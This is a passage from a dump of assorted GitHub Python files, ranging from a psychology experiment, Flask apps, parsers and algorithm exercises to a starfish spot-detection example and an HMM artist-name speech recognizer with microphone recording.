order of the trials\n for _, value in enumerate(appeared):\n if nbr_aleatoire == value :\n break\n else : \n ok = True\n \n appeared.append(nbr_aleatoire)\n sound = expyriment.stimuli.Audio(tableau[nbr_aleatoire][0]) #define audio stimuli\n image1 = expyriment.stimuli.Picture(tableau[nbr_aleatoire][1], position = (-200, 0)) #define visual stimuli\n image2 = expyriment.stimuli.Picture(tableau[nbr_aleatoire][2], position = (200, 0))\n BB = expyriment.io.TouchScreenButtonBox([image1, image2]) #create a button box for the two visual stimuli\n BB.create()\n BB.show()\n \n sound.present()\n \n response, rt = BB.wait(duration = 8000) \n \n #Gets only the name of the stimuli (remove \"sounds\" or \"pictures\" from their pathname)\n shortSound = tableau[nbr_aleatoire][0][7:] \n shortImage1 = tableau[nbr_aleatoire][1][9:]\n shortImage2 = tableau[nbr_aleatoire][2][9:]\n \n #check participants' accuracy \n if response == image1 and tableau[nbr_aleatoire][3] == 1:\n print(\"1\")\n trueOrFalse = \"True\"\n elif response == image2 and tableau[nbr_aleatoire][3] == 2:\n print(\"2\")\n trueOrFalse = \"True\"\n else :\n trueOrFalse = \"False\"\n print(trueOrFalse)\n \n #add data under the label defined earlier\n exp.data.add([shortSound,\n shortImage1,\n shortImage2,\n trueOrFalse,\n rt])\n \n #add data into 'tabData' that I use to create accuracy and rt histograms\n tabData[i][0] = shortSound \n tabData[i][1] = trueOrFalse\n tabData[i][2] = rt\n \n fixcross.present()\n exp.clock.wait(1000)\n i += 1 #add 1 to i. 
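    # (a hypothetical alternative to the rejection loop above, assuming 'import random':\n    #   trial_order = random.sample(range(16), 16)\n    # would draw the same non-repeating presentation order in a single call.)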
Loop keeps going until i reaches 16\n \n \nexpyriment.control.end(goodbye_text= 'Thanks for taking part to this experiment, see you soon')\n \nAccuracyPlot(tabData) #show accuracy histogram\nRTplot(tabData) #show rt histogram\n \n","repo_name":"Leoyop/PCBS_Looking-while-listening_task","sub_path":"PCBS_Looking_while_listening.py","file_name":"PCBS_Looking_while_listening.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38791425648","text":"import ConfigParser\nimport logging\nimport logging.handlers\n\nclass ConfigurationIni(object):\n CONFIGS = [\n ('DEBUG', bool),\n ('SQLALCHEMY_DATABASE_URI', str),\n ('SQLALCHEMY_ECHO', bool),\n ('LOG_FILE', str),\n ('LOG_FILE_MAX_BYTES', int)\n ]\n\n def __init__(self, filename, section_name='flask'):\n #Parsed configuration will be stored here\n self.configuration = {}\n\n self._cfg = ConfigParser.SafeConfigParser()\n self._cfg.read(filename)\n\n #Now parse the ini section and load it into configuration dict\n self._parse_ini_file(section_name)\n\n\n def _parse_ini_file(self, section_name):\n parse_mapping = {\n bool: self._cfg.getboolean,\n int: self._cfg.getint,\n float: self._cfg.getfloat,\n str: self._cfg.get,\n }\n\n for cfg, _type in ConfigurationIni.CONFIGS:\n cfg_lower = cfg.lower()\n if self._cfg.has_option(section_name, cfg_lower):\n val = parse_mapping[_type](section_name, cfg_lower)\n if val is not None:\n self.configuration[cfg] = val\n\n def load_configuration(self, app):\n for key, value in self.configuration.iteritems():\n app.config[key] = value\n\ndef configure_app(app, filename='config.ini'):\n \"\"\"\n :type app: flask.Flask\n :return:\n \"\"\"\n config_ini = ConfigurationIni(filename)\n\n #apply the configuration to our app!\n config_ini.load_configuration(app)\n\n #Apply logging\n log_file_handler = logging.handlers.RotatingFileHandler(\n app.config.get('LOG_FILE', app.name + '.log'),\n maxBytes=app.config.get('LOG_FILE_MAX_BYTES', 10000),\n backupCount=1\n )\n log_file_handler.setLevel(logging.DEBUG if app.debug else logging.ERROR)\n\n app.logger.addHandler(log_file_handler)\n","repo_name":"Rastii/BilliardStats","sub_path":"BilliardStats/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19949057025","text":"import re\nimport os\nfrom ..classes.locations.event import Event, Choice, Choices, EventOutcome\n\ndef parse_event_outcome(outcome_description, arguments, item_dict, monster_dict):\n \"\"\"Create an EventOutcome object from the outcome description and arguments.\"\"\"\n # Parse and create Items, Special Effects, Attacks, Spells, Monsters, etc. 
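    # (illustrative, assumed argument format, not taken from the repo: each entry in\n    # arguments looks like 'key=value', e.g. '--hp=3' or '--items=\\[[[Sword]]]'.\n    # Note: str.isdigit() is False for negatives such as '-5', so negative numeric\n    # values fall through and are stored as strings by the 'else' branch below.)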
from arguments\n effects = {\n \"items\" : [],\n \"special_effect\" : None,\n \"attacks\" : [],\n \"spells\" : [],\n \"monsters\" : [],\n \"incomplete\" : False,\n \"location_change\" : None,\n \"new_event\" : None,\n \"stay_in_event\" : False,\n \"lose_item\" : None,\n \"gold_change\" : 0,\n \"hp\" : 0\n }\n\n items_pattern = re.compile(r'\\\\\\[\\[\\[(.*?)\\]\\]\\]')\n monsters_pattern = re.compile(r'\\\\\\[\\[\\[(.*?)\\]\\]\\]')\n\n for arg in arguments:\n key, value = arg.split('=')\n key = key.replace('-', '').lower().strip()\n\n if key == 'items':\n item_matches = items_pattern.findall(value)\n items = [item_dict[item_name.strip().lower()] for item_name in item_matches if item_name.strip().lower() in item_dict]\n effects[\"items\"] = items\n elif key == 'monsters':\n monster_matches = monsters_pattern.findall(value)\n monsters = [monster_dict[monster_name.strip().lower()] for monster_name in monster_matches if monster_name.strip().lower() in monster_dict]\n effects[\"monsters\"] = monsters\n else:\n # Convert numeric values to integers\n if value.isdigit():\n effects[key] = int(value)\n else:\n effects[key] = value\n \n # Create the EventOutcome object with all the gathered information\n return EventOutcome(outcome_description, items=effects[\"items\"], special_effect=effects[\"special_effect\"],\n attacks=effects[\"attacks\"], spells=effects[\"spells\"], monsters=effects[\"monsters\"],\n incomplete=effects[\"incomplete\"], location_change=effects[\"location_change\"],\n new_event=effects[\"new_event\"], stay_in_event=effects[\"stay_in_event\"],\n lose_item=effects[\"lose_item\"], gold_change=effects[\"gold_change\"], health_change=effects[\"hp\"])\n\ndef parse_choice(choice_text, item_dict, monster_dict):\n lines = choice_text.strip().split('\\n')\n description = lines[0].split(':')[1].strip()\n outcome_description = lines[1].split(':')[1].strip()\n arguments = lines[2:]\n \n outcome = parse_event_outcome(outcome_description, arguments, item_dict, monster_dict)\n return Choice(description, outcome)\n\ndef parse_event_file(file_path, player, item_dict, monster_dict):\n event_name = os.path.basename(file_path).replace('.md', '').replace('_', ' ').title()\n \n with open(file_path, 'r') as file:\n content = file.read()\n\n # Split the content by sections and remove any empty lines or irrelevant headers\n sections = content.split('##')\n description = sections[1].strip()\n # First, split the entire choices section into lines\n choices_lines = sections[2].strip().split('\\n')\n \n # Then, group lines into choices\n choices_text = []\n current_choice = []\n for line in choices_lines:\n if line.startswith('Description:') and current_choice:\n # When we hit a new 'Description:', we join the current choice's lines and reset for the next one\n choices_text.append('\\n'.join(current_choice).strip())\n current_choice = [line] # Start new choice with current line\n elif line.strip() and not line.startswith('Choices:'):\n # Otherwise, add line to current choice\n current_choice.append(line)\n \n # Don't forget to \n # add the last choice if it exists\n if current_choice:\n choices_text.append('\\n'.join(current_choice).strip())\n \n # Assuming that parse_choice function correctly processes each individual choice text\n choices = [parse_choice(choice, item_dict, monster_dict) for choice in choices_text]\n choices_object = Choices(choices)\n\n event = Event(name=event_name, description=description, choices=choices_object, player=player)\n return event\n\n# Usage\ndef generate_event_dict(tier, 
player, item_dict, monster_dict):\n \"\"\"Generate a dictionary of events for a given tier.\"\"\"\n event_directory = os.path.join(os.path.dirname(__file__),'..', f'vault/t{tier}/events')\n event_directory = os.path.normpath(event_directory)\n event_dict = {}\n\n for filename in os.listdir(event_directory):\n if filename.endswith('.md'):\n file_path = os.path.join(event_directory, filename)\n event = parse_event_file(file_path, player, item_dict, monster_dict)\n event_name = filename.rstrip('.md') # This assumes the filename without .md is the event's name\n event_dict[event_name] = event\n\n return event_dict\n\n","repo_name":"scicluna/clirpg","sub_path":"parsers/parseevent.py","file_name":"parseevent.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5548744681","text":"def kWeakestRows(mat, k: int):\n \n # Rows\n m = len(mat)\n \n # Columns\n n = len(mat[0])\n \n # In Brute Force approach, For each row, we are traversing the whole row to count the soldiers\n # Suppose if whole row has soldiers only. In that case, we will traverse the whole row\n \n # Since we already know that soldiers stand in front of civilians\n # It means, as soon as we encounter a civilian, there is no soldier on the right\n # So, basically, each row is in a sorted order\n # And so, to count soldiers, we can use Binary Search instead\n \n # Each data will be a pair (soldierCount, rowIndex)\n rowData = []\n \n # Go through each row\n for i in range(m):\n \n # Count of soldiers\n count = 0\n \n # Use Binary search\n \n # Index of rigtmost soldier in row after which all are civilians\n indexOfRightMostSoldier = -1\n \n start = 0\n end = n - 1\n \n while start <= end:\n \n mid = start + (end - start) // 2\n \n # If at \"mid\" we have a soldier\n # It may or may not be the rightmost soldier\n # So, we save its index and keep searching on right side of mid\n if mat[i][mid] == 1:\n indexOfRightMostSoldier = mid\n start = mid + 1\n \n # If at \"mid\" we have a civilian, there cannot be a soldier on right\n # So, we search on left side of mid for the index of rightmost soldier\n else: end = mid - 1\n \n # If there are soldiers in this row, the index will not be -1\n if indexOfRightMostSoldier != -1: count = indexOfRightMostSoldier + 1\n \n # Add the count and the index of the row in the rowData\n rowData.append((count, i))\n \n # Finally, sort the rowData in inreasing order based on count\n rowData.sort()\n \n # And finally, return the \"k\" weakest rows\n return [pair[1] for pair in rowData][:k]\n\n\nmat = [[1,1,0,0,0],\n [1,1,1,1,0],\n [1,0,0,0,0],\n [1,1,0,0,0],\n [1,1,1,1,1]]\nk = 3\n\nprint(\"Output -> \", kWeakestRows(mat,k))\n\n","repo_name":"itsarvindhere/heap","sub_path":"003. 
The K Weakest Rows in a Matrix/BinarySearchSorting.py","file_name":"BinarySearchSorting.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26755012573","text":"import os\nimport logging\n\nlogger = logging.getLogger('ner.prep.wikiann')\n\n\ndef clean(args) -> None:\n data = ''\n invalid = {\"''\", \"'\", \"]]\", \"[[\", \"==\", \"**\", \"``\"}\n counter = 0\n sent_id = 0\n prefix = args.lang + ':'\n with open(os.path.join(args.process_file_name), 'rt', encoding='utf-8') as fp:\n line = 'whatever'\n while line:\n line = fp.readline()\n if line == '\\n':\n if counter > 0:\n data += '\\n'\n counter = 0\n continue\n if line == '':\n continue\n tokens = line.split('\\t')\n if tokens[0] and tokens[0].startswith(prefix):\n tokens[0] = tokens[0][len(prefix):]\n if tokens[0] in invalid:\n continue\n if tokens[0].startswith(\"''\"):\n tokens[0] = tokens[0][2:]\n if tokens[0].startswith(\"**\"):\n tokens[0] = tokens[0][2:]\n if counter == 0:\n data += '# sent_id = ' + str(sent_id) + '\\n'\n sent_id += 1\n if counter == 0 and tokens[0] == '-':\n continue\n if counter == 0 and tokens[0] == '–':\n continue\n if counter == 0 and tokens[0] == ',':\n continue\n if counter == 0 and tokens[0] == ')':\n continue\n data += str(counter) + '\\t' + tokens[0] + '\\t' + tokens[1]\n counter += 1\n\n with open(os.path.join(args.process_file_name), 'wt', encoding='utf-8') as fp:\n fp.write(data)\n\n\ndef default_conf(args):\n conf = {\n 'type': 'wikiann',\n 'lang': args.lang,\n 'zip': args.lang + '-wann.zip',\n 'proc_file': args.lang + '_wann',\n 'result_name': args.lang + '_wann',\n 'ner_conll_idx': 2,\n 'map_filter': {\n 'max_seq_len': 128\n }\n }\n return conf\n","repo_name":"ivlcic/neuroticla","sub_path":"neuroticla/ner/prep/wikiann.py","file_name":"wikiann.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36574131277","text":"\n## Python Crash Course\n\n# Exercise 3.4: Guest List: \n# If you could invite anyone, living or deceased, to dinner, who would you invite? \n# Make a list that includes at least three people you’d like to invite to dinner . \n# Then use your list to print a message to each person, inviting them to dinner .\n\ndef main():\n \n # Prepare empty list for invitees \n dinnerInvitees = []\n\n # Add invitees one by one in the invitees list\n dinnerInvitees.append('Andrew Ng')\n dinnerInvitees.append('Narendra Modi')\n dinnerInvitees.append('Jordon')\n \n # Send invitation to invitees\n for i in range(len(dinnerInvitees)):\n \n # Generic greeting message\n greetingMessage = \"Hi \" + str(dinnerInvitees[i]) + \", it's my birthday today, would you join us for the dinner? 
\" \\\n \"\\nWe also have following guests joining us: \"\n \n # Create list of other guests at the dinner \n listOfInvitees = dinnerInvitees.copy()\n del listOfInvitees[i]\n \n # Print invitation\n print(\"\\n### \\t Birthday Bash \\t ###\")\n print(greetingMessage)\n\n # Print list of other guests\n for x in range(len(listOfInvitees)):\n print(listOfInvitees[x])\n\n # Print end of invitation \n print(\"\\n###########################\\n\\n\") \n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"akshaymoharir/PythonCrashCourse","sub_path":"chapter_3/ex_3-4.py","file_name":"ex_3-4.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18040063484","text":"\"\"\"\n.. _howto_blobdetector:\n\nFinding Spots with :py:class:`.BlobDetector`\n============================================\n\nRNA FISH spots are usually bright point spread functions in a greyscale image.\n:term:`Rolonies`, which are rolling-circle amplicons produced in certain assays (e.g. in\nsitu sequencing), are approximately 1-um diameter Gaussian spots. Despite their minor differences in\nsize and intensity profiles, these \"blobs\" can be detected using a common computer vision\ntechnique that convolves kernels with an image to identify where the blobs are. The kernels,\nor filters as they are sometimes called, find spots that are the same size as it.\n\nStarfish implements this blob detection technique with :py:class:`.BlobDetector`. It supports three\n`approaches `_\nthat can be chosen with the ``detector_method`` argument when instantiating the\ndetector. The default LoG approach produces the most accurate results and should be used unless\ncomputation time becomes a concern.\n\nIn order to detect spots of various sizes in the same set of images, :py:class:`.BlobDetector`\nconvolves kernels of multiple sizes and picks the best fit for each spot. The kernel sizes are\ndefined by sigma, which is the standard deviation of the Gaussian used in each approach. The user\nmust define the range of sigmas to be used with the ``min_sigma``, ``max_sigma`` and ``num_sigma``\narguments. Picking the right sigma requires looking at the images and approximating the size of\nspots. Using a wider range of sizes and increasing ``num_sigma`` can find more spots but will\nrequire more computation time and possibly capture noise that is not the correct size as true RNA\nspots. That is why it is recommended to only choose sigmas that make sense for the experiment and\nmicroscope settings. The table below is a helpful guide for setting the sigma parameters based on\nradii of spots.\n\n.. list-table::\n :widths: auto\n :header-rows: 1\n\n * - Approach\n - Sigma =\n * - LoG 2D\n - radius / sqrt(2)\n * - LoG 3D\n - radius / sqrt(3)\n * - DoG 2D\n - radius / sqrt(2)\n * - DoG 3D\n - radius / sqrt(3)\n * - DoH\n - radius\n\nAnother parameter of :py:class:`.BlobDetector` is ``threshold``, which filters out spots with\nlow intensities that are likely background noise. One way to set ``threshold`` is to choose a\nconservatively low value to start with on a representative image and :ref:`visually assess\n` results. If the image has a high SNR the ``threshold`` is trivial but\nif there is high background, then choosing the right ``threshold`` value can become subjective.\nAnother way to estimate ``threshold`` is :ref:`howto_localmaxpeakfinder` and examining the\nintensities of the spots.\n\n.. 
warning::\n :py:class:`.BlobDetector` is not compatible with cropped data sets.\n\n\"\"\"\n\n# Load in situ sequencing experiment\nfrom starfish.image import ApplyTransform, LearnTransform, Filter\nfrom starfish.types import Axes\nfrom starfish import data, FieldOfView\nfrom starfish.spots import FindSpots\nfrom starfish.util.plot import imshow_plane\nexperiment = data.ISS()\nfov = experiment.fov()\nimgs = fov.get_image(FieldOfView.PRIMARY_IMAGES) # primary images\ndots = fov.get_image(\"dots\") # reference round where every spot labeled with fluorophore\n\n# filter raw data\nmasking_radius = 15\nfilt = Filter.WhiteTophat(masking_radius, is_volume=False)\nfilt.run(imgs, in_place=True)\nfilt.run(dots, in_place=True)\n\n# register primary images to reference round\nlearn_translation = LearnTransform.Translation(reference_stack=dots, axes=Axes.ROUND, upsampling=1000)\ntransforms_list = learn_translation.run(imgs.reduce({Axes.CH, Axes.ZPLANE}, func=\"max\"))\nwarp = ApplyTransform.Warp()\nwarp.run(imgs, transforms_list=transforms_list, in_place=True)\n\n# view dots to estimate radius of spots: radius range from 1.5 to 4 pixels\nimshow_plane(dots, {Axes.X: (500, 550), Axes.Y: (600, 650)})\n\n# run blob detector with dots as reference image\n# following guideline of sigma = radius/sqrt(2) for 2D images\n# threshold is set conservatively low\nbd = FindSpots.BlobDetector(\n min_sigma=1,\n max_sigma=3,\n num_sigma=10,\n threshold=0.01,\n is_volume=False,\n measurement_type='mean',\n)\nspots = bd.run(image_stack=imgs, reference_image=dots)","repo_name":"spacetx/starfish","sub_path":"examples/how_to/blob_detector.py","file_name":"blob_detector.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"43785079711","text":"from routes.endpoints.endpoint_classes import *\n\nNUTRITION_DAY_EP = Endpoint('/nutrition/days') \\\n .add_method(GET, \n EndpointMethod(name='get all days with nutrition data or get a speciic day with nutritional data') \\\n .add_param_arg('date', EndpointArgument(DATE, optional=True))\n ) \\\n .add_method(POST,\n EndpointMethod(name='create day with nutrition data') \\\n .add_body_arg('date', EndpointArgument(DATE))\n .add_body_arg('entries', EndpointArgument(LIST) \\\n .add_subarg('0', EndpointArgument(JSON) \\\n .add_subarg('ndbno', EndpointArgument(NUMBER)) \\\n .add_subarg('amount', EndpointArgument(NUMBER) ) \\\n .add_subarg('unit', EndpointArgument(STRING))))\n ) \\\n .add_method(PUT,\n EndpointMethod(name='edit day with nutrition data') \\\n .add_body_arg('date', EndpointArgument(DATE))\n .add_body_arg('entries', EndpointArgument(LIST, optional=True) \\\n .add_subarg('0', EndpointArgument(JSON, optional=True) \\\n .add_subarg('ndbno', EndpointArgument(NUMBER)) \\\n .add_subarg('amount', EndpointArgument(NUMBER)) \\\n .add_subarg('unit', EndpointArgument(STRING)) \\\n .add_subarg('label', EndpointArgument(STRING))))\n ) \\\n .add_method(DELETE,\n EndpointMethod(name='delete day with nutrition data') \\\n .add_body_arg('date', EndpointArgument(DATE))\n )","repo_name":"weimingw/weiming-portfolio","sub_path":"weiming-backend/routes/endpoints/nutrition_endpoints.py","file_name":"nutrition_endpoints.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11861666108","text":"#!/usr/bin/python3\nif __name__ == \"__main__\":\n import sys\n ac = len(sys.argv)\n\n if ac == 1:\n 
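        # len(sys.argv) == 1 means the script received no arguments, so the sum is reported as 0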
print(\"0\")\n\n elif ac > 1:\n sum = 0\n for i in range(1, ac):\n sum = sum + int(sys.argv[i])\n\n print(\"{:d}\".format(sum))\n","repo_name":"zabimaru1000/holbertonschool-higher_level_programming","sub_path":"0x02-python-import_modules/3-infinite_add.py","file_name":"3-infinite_add.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70860551146","text":"from flask import Flask\nfrom flask import Response\nfrom flask import request\nfrom flask_api import status\nfrom flask_cors import CORS\nimport json\n\nfrom lib.db import Database\nfrom lib.db.models.synth_button_setting import SynthButtonSetting\nfrom lib.db.models.wav_file import WavFile\nfrom lib.http.controllers import synth_button_setting_controller\nfrom lib.http.controllers import wav_file_controller\nfrom lib.synth import AudioManager\n\n\ndef generate_flask_app(audio_manager: AudioManager) -> Flask:\n \"\"\"\n Generates a Flask application on demand. In a function, rather than a\n global objcet, to avoid the use of global variables.\n \"\"\"\n app = Flask(__name__)\n CORS(app)\n\n @app.route(\"/button/count\", methods=[\"GET\"])\n def get_button_count():\n return synth_button_setting_controller.get_synth_button_count()\n\n @app.route(\"/buttons\", methods=[\"GET\"])\n def get_synth_button_settings():\n synth_button_settings = (\n synth_button_setting_controller.get_synth_button_settings()\n )\n return Response(\n \"[\"\n + \",\".join(\n [\n synth_button_setting.to_json()\n for synth_button_setting in synth_button_settings\n ]\n )\n + \"]\",\n content_type=\"application/json\",\n )\n\n @app.route(\"/button/\", methods=[\"GET\"])\n def get_synth_button_setting(index: int):\n setting = synth_button_setting_controller.get_synth_button_setting(index)\n if setting is None:\n return \"\", status.HTTP_404_NOT_FOUND\n\n return Response(setting.to_json(), content_type=\"application/json\")\n\n @app.route(\"/button/\", methods=[\"PUT\"])\n def put_synth_button_setting(index: int):\n json = request.get_json()\n if json is None:\n return \"\", status.HTTP_415_UNSUPPORTED_MEDIA_TYPE\n\n setting = synth_button_setting_controller.put_synth_button_setting(\n index, json, audio_manager\n )\n if setting is None:\n return \"\", status.HTTP_400_BAD_REQUEST\n\n return Response(setting.to_json(), content_type=\"application/json\")\n\n @app.route(\"/samples\", methods=[\"GET\"])\n def get_samples():\n wav_files = wav_file_controller.get_samples()\n return Response(\n \"[\" + \",\".join([wav_file.to_json() for wav_file in wav_files]) + \"]\",\n content_type=\"application/json\",\n )\n\n @app.route(\"/sample/\", methods=[\"GET\"])\n def get_sample(id: str):\n wav_file = wav_file_controller.get_sample(id)\n if wav_file is None:\n return \"\", status.HTTP_404_NOT_FOUND\n _, data = wav_file\n\n return Response(data, content_type=\"audio/wav\")\n\n @app.route(\"/sample\", methods=[\"POST\"])\n def post_sample():\n file_name = \"sampleFile\"\n if file_name not in request.files or request.files[file_name].filename == \"\":\n return \"\", status.HTTP_400_BAD_REQUEST\n file = request.files[file_name]\n\n wav_file = wav_file_controller.post_sample(file.filename, file.read())\n\n return Response(\n json.dumps({\"id\": wav_file.id}), content_type=\"application/json\"\n )\n\n return 
app\n","repo_name":"crockeo/pyed-piper","sub_path":"server/lib/http/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29105843860","text":"def longestConsecutive(A):\n temp_dict = {}\n for i in range(len(A)):\n if A[i] not in temp_dict :\n temp_dict[A[i]] = i\n \n count = 0\n for i in range(len(A)):\n temp = 1\n if A[i]-1 not in temp_dict:\n val = A[i] + 1\n while val <= max(A):\n if val in temp_dict:\n val += 1\n temp += 1\n else:\n break\n count = max(temp, count)\n return count\n\nA = [100,4,200,1,3,2]\nA = [ 6, 4, 5, 2, 3 ]\nprint(longestConsecutive(A))","repo_name":"chithra-m/ds_code_snippets","sub_path":"course/longest_consecutive_element.py","file_name":"longest_consecutive_element.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19408321291","text":"# !/usr/bin/env python\n\nfrom prettytable import PrettyTable\nfrom utils import Word, WordHMM\nimport os\n\n#audio stuff\nimport pyaudio\nimport wave\nfrom sys import byteorder\nfrom array import array\nfrom struct import pack\nimport copy\n\n\n######################################\n# Data loading functions\n######################################\n\n\ndef load_data(data, category):\n os.chdir(category)\n for filename in os.listdir(os.getcwd()):\n if filename.endswith(\".wav\"):\n W = Word(category, filename)\n W.set_mfcc_matrix()\n data.append(W)\n os.chdir(\"..\")\n\n\ndef load_all_training_data(training_data_list, category_labels):\n os.chdir(\"Training_Data\")\n for category in category_labels:\n load_data(training_data_list, category)\n os.chdir(\"..\")\n\n\ndef load_all_testing_data(testing_data_list, category_labels):\n os.chdir(\"Testing_Data\")\n for category in category_labels:\n load_data(testing_data_list, category)\n os.chdir(\"..\")\n\n######################################\n# HMM FUNCTIONS\n######################################\n\n\ndef train_hmms(words, category_list):\n 'Train the Hmm'\n word_hmms = list()\n\n # create an HMM for each category\n for category in category_list:\n w = WordHMM(category)\n word_hmms.append(w)\n\n for word_hmm in word_hmms:\n for training_word in words:\n if training_word.get_category() == word_hmm.get_category():\n word_hmm.add_to_training_data(training_word.get_mfcc_matrix())\n\n # get hmm model\n num_components = 5\n if word_hmm.get_category() == 'Play' or word_hmm.get_category() == 'Wayne':\n num_components = 3\n\n if word_hmm.get_category() == 'Drake':\n num_components = 4\n\n if word_hmm.get_category() == 'Kendrick' or word_hmm.get_category() == 'Gambino'\\\n or word_hmm.get_category() == 'KendrickLamar':\n num_components = 6\n\n word_hmm.init_model_param(n_hidden_states=num_components, n_mixtures=3,\n covariance_type='diag', n_iter=10)\n word_hmm.get_hmm_model()\n\n normalize_categories(word_hmm)\n\n return word_hmms\n\n\ndef init_categories():\n artist_categories = list()\n artist_categories.append(\"Play\")\n artist_categories.append(\"Drake\")\n artist_categories.append(\"Kendrick\")\n artist_categories.append(\"Chance\")\n artist_categories.append(\"Kanye\")\n artist_categories.append(\"Wayne\")\n artist_categories.append(\"Snoop\")\n artist_categories.append(\"Gambino\")\n artist_categories.append(\"Eminem\")\n artist_categories.append(\"MacMiller\")\n artist_categories.append(\"PostMalone\")\n\n # below categories added to improve 
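    # (note: 'LilWayne' and 'KendrickLamar' are trained as separate HMMs, and\n    # normalize_categories() later folds their predictions back into 'Wayne' and\n    # 'Kendrick', e.g. a clip matched by the 'LilWayne' model is reported as 'Wayne'.)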
performance\n artist_categories.append(\"LilWayne\")\n artist_categories.append(\"KendrickLamar\")\n\n return artist_categories\n\n\ndef predict(test_words, word_hmms):\n ''' recognition '''\n predicted_category_list = list()\n\n for artist in test_words:\n scores = list()\n\n for recognizer in word_hmms:\n score = recognizer.wordhmm.score(artist.get_mfcc_matrix())\n scores.append(score)\n\n idx = scores.index(max(scores))\n predicted_category = word_hmms[idx].get_category()\n predicted_category_list.append(predicted_category)\n\n return predicted_category_list\n\n\ndef get_classification_rate(actual_value_list, predicted_value_list):\n num_correct = 0\n length1 = len(actual_value_list)\n length2 = len(predicted_value_list)\n\n if length1 != length2:\n raise ValueError(\"Lengths of list are not equal\")\n\n for i in range(length1):\n if actual_value_list[i] == predicted_value_list[i]:\n num_correct += 1\n\n return float(num_correct)/length1\n\n\ndef normalize_categories(artist):\n # normalize categories for words that had multiple training labels\n # Lil Wayne -> Wayne\n # Kendrick Lamar -> Kendrick\n # used to normalize both the HMM_category and the training / testing data categories\n\n if artist.get_category() == 'LilWayne':\n artist.set_category('Wayne')\n if artist.get_category() == 'KendrickLamar':\n artist.set_category('Kendrick')\n\n\n######################################\n# AUDIO RECORD FUNCTIONS\n# https://stackoverflow.com/questions/892199/detect-record-audio-in-python\n######################################\nTHRESHOLD = 500 # audio levels not normalised.\nCHUNK_SIZE = 1024\nSILENT_CHUNKS = 70\n# SILENT_CHUNKS = 3 * 44100 / 1024 # about 3sec\nFORMAT = pyaudio.paInt16\nFRAME_MAX_VALUE = 2 ** 15 - 1\nNORMALIZE_MINUS_ONE_dB = 10 ** (-1.0 / 20)\nRATE = 44100\nCHANNELS = 1\nTRIM_APPEND = RATE / 4\n\n\ndef is_silent(data_chunk):\n \"\"\"Returns 'True' if below the 'silent' threshold\"\"\"\n return max(data_chunk) < THRESHOLD\n\n\ndef normalize(data_all):\n \"\"\"Amplify the volume out to max -1dB\"\"\"\n # MAXIMUM = 16384\n normalize_factor = (float(NORMALIZE_MINUS_ONE_dB * FRAME_MAX_VALUE)\n / max(abs(i) for i in data_all))\n\n r = array('h')\n for i in data_all:\n r.append(int(i * normalize_factor))\n return r\n\n\ndef trim(data_all):\n _from = 0\n _to = len(data_all) - 1\n for i, b in enumerate(data_all):\n if abs(b) > THRESHOLD:\n _from = max(0, i - TRIM_APPEND)\n break\n\n for i, b in enumerate(reversed(data_all)):\n if abs(b) > THRESHOLD:\n _to = min(len(data_all) - 1, len(data_all) - 1 - i + TRIM_APPEND)\n break\n\n return copy.deepcopy(data_all[_from:(_to + 1)])\n\n\ndef record():\n \"\"\"Record a word or words from the microphone and\n return the data as an array of signed shorts.\"\"\"\n\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK_SIZE)\n\n silent_chunks = 0\n audio_started = False\n data_all = array('h')\n\n while True:\n # little endian, signed short\n data_chunk = array('h', stream.read(CHUNK_SIZE))\n if byteorder == 'big':\n data_chunk.byteswap()\n data_all.extend(data_chunk)\n\n silent = is_silent(data_chunk)\n\n if audio_started:\n if silent:\n silent_chunks += 1\n if silent_chunks > SILENT_CHUNKS:\n break\n else:\n silent_chunks = 0\n elif not silent:\n audio_started = True\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n data_all = trim(data_all) # we trim before normalize as threshhold applies to un-normalized wave (as 
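    # worked example for normalize(): with FRAME_MAX_VALUE = 32767 and\n    # NORMALIZE_MINUS_ONE_dB = 10 ** (-1.0 / 20) ~= 0.891, a recording whose loudest\n    # sample is 8000 gets a gain of 0.891 * 32767 / 8000 ~= 3.65, scaling its peak\n    # up to about -1 dBFS.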
